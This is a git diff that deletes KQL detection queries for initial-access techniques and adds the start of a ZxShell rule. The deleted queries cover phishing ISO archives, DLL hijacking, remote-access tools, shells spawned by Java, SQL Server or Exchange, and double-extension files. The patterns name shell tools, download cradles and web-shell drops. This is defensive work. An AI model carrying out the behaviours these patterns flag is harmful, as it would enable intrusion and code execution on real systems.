diff --git a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql b/Initial Access/Phishing_Pattern_ISO_in_Archive.kql
deleted file mode 100644
index 12c62ad9..00000000
--- a/Initial Access/Phishing_Pattern_ISO_in_Archive.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/07
-// Level: high
-// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
-// Tags: attack.initial_access, attack.t1566
-DeviceProcessEvents
-| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe")
\ No newline at end of file
diff --git a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
deleted file mode 100644
index 3c74a001..00000000
--- a/Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
-// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql b/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql
deleted file mode 100644
index 23d22f38..00000000
--- a/Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/08
-// Level: medium
-// Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
-Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
-Use this rule to detect instances of older versions of Anydesk using the compromised certificate
-This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
-
-// Tags: attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ((FolderPath endswith "\\AnyDesk.exe" or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (ProcessVersionInfoProductVersion startswith "7.0." or ProcessVersionInfoProductVersion startswith "7.1." or ProcessVersionInfoProductVersion startswith "8.0.1" or ProcessVersionInfoProductVersion startswith "8.0.2" or ProcessVersionInfoProductVersion startswith "8.0.3" or ProcessVersionInfoProductVersion startswith "8.0.4" or ProcessVersionInfoProductVersion startswith "8.0.5" or ProcessVersionInfoProductVersion startswith "8.0.6" or ProcessVersionInfoProductVersion startswith "8.0.7")) and (not((ProcessCommandLine contains " --remove" or ProcessCommandLine contains " --uninstall")))
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql
deleted file mode 100644
index e2ed740c..00000000
--- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/11
-// Level: medium
-// Description: Detects ScreenConnect program starts that establish a remote access to a system.
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k="
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql b/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql
deleted file mode 100644
index e7f24392..00000000
--- a/Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jason Rathbun (Blackpoint Cyber)
-// Date: 2024/02/26
-// Level: high
-// Description: Detects potential web shell execution from the ScreenConnect server process.
-// Tags: attack.initial_access, attack.t1190
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe") and InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe"
\ No newline at end of file
diff --git a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql b/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql
deleted file mode 100644
index 700bc666..00000000
--- a/Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Josh Nickels, Qi Nan
-// Date: 2024/03/11
-// Level: low
-// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
-Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
-
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe"
\ No newline at end of file
diff --git a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql b/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Initial Access/Shell_Process_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql b/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Double_Extension_File_Execution.kql b/Initial Access/Suspicious_Double_Extension_File_Execution.kql
deleted file mode 100644
index 61a0e484..00000000
--- a/Initial Access/Suspicious_Double_Extension_File_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/06/26
-// Level: critical
-// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
-// Tags: attack.initial_access, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".txt.js") and (FolderPath endswith ".doc.exe" or FolderPath endswith ".docx.exe" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.js" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.js" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.js" or FolderPath endswith ".pdf.js" or FolderPath endswith ".txt.js")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql b/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql
deleted file mode 100644
index 2b34c9c1..00000000
--- a/Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/01
-// Level: high
-// Description: Detects a suspicious program execution in Outlook temp folder
-// Tags: attack.initial_access, attack.t1566.001
-DeviceProcessEvents
-| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_File_Drop_by_Exchange.kql b/Initial Access/Suspicious_File_Drop_by_Exchange.kql
deleted file mode 100644
index 6f40640f..00000000
--- a/Initial Access/Suspicious_File_Drop_by_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/04
-// Level: medium
-// Description: Detects suspicious file type dropped by an Exchange component in IIS
-// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003
-DeviceFileEvents
-| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_HH.EXE_Execution.kql b/Initial Access/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Initial Access/Suspicious_HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_HWP_Sub_Processes.kql b/Initial Access/Suspicious_HWP_Sub_Processes.kql
deleted file mode 100644
index 7c00588f..00000000
--- a/Initial Access/Suspicious_HWP_Sub_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
-DeviceProcessEvents
-| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
deleted file mode 100644
index 039ecce5..00000000
--- a/Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
-// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql b/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql
deleted file mode 100644
index cf718847..00000000
--- a/Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
-// Date: 2022/10/21
-// Level: high
-// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
-// Tags: attack.t1566, attack.t1566.001, attack.initial_access
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith 
"\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"))))
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql b/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 7ac4d66c..00000000
--- a/Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021/12/17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql b/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql
deleted file mode 100644
index 156ae6e7..00000000
--- a/Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021/05/20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// Tags: attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Initial Access/Terminal_Service_Process_Spawn.kql b/Initial Access/Terminal_Service_Process_Spawn.kql
deleted file mode 100644
index 0e46fcfe..00000000
--- a/Initial Access/Terminal_Service_Process_Spawn.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/05/22
-// Level: high
-// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-// Tags: attack.initial_access, attack.t1190, attack.lateral_movement, attack.t1210, car.2013-07-002
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Initial Access/Unusual_Child_Process_of_dns.exe.kql b/Initial Access/Unusual_Child_Process_of_dns.exe.kql
deleted file mode 100644
index 3866f302..00000000
--- a/Initial Access/Unusual_Child_Process_of_dns.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe"))
\ No newline at end of file
diff --git a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql b/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql
deleted file mode 100644
index 5cd09102..00000000
--- a/Initial Access/Unusual_File_Deletion_by_Dns.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/Initial Access/Unusual_File_Modification_by_dns.exe.kql b/Initial Access/Unusual_File_Modification_by_dns.exe.kql
deleted file mode 100644
index 1c228bcf..00000000
--- a/Initial Access/Unusual_File_Modification_by_dns.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
-// Tags: attack.initial_access, attack.t1133
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/Initial Access/Windows_Registry_Trust_Record_Modification.kql b/Initial Access/Windows_Registry_Trust_Record_Modification.kql
deleted file mode 100644
index 614be3d0..00000000
--- a/Initial Access/Windows_Registry_Trust_Record_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb, Trent Liffick (@tliffick)
-// Date: 2020/02/19
-// Level: medium
-// Description: Alerts on trust record modification within the registry, indicating usage of macros
-// Tags: attack.initial_access, attack.t1566.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql b/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql
new file mode 100644
index 00000000..0f4c6957
--- /dev/null
+++ b/KQL/rules-emerging-threats/2014/TA/Axiom/zxshell_malware.kql
@@ -0,0 +1,12 @@
+// Title: ZxShell Malware
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2017-07-20
+// Level: critical
+// Description: Detects a ZxShell start by the called and well-known function name
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
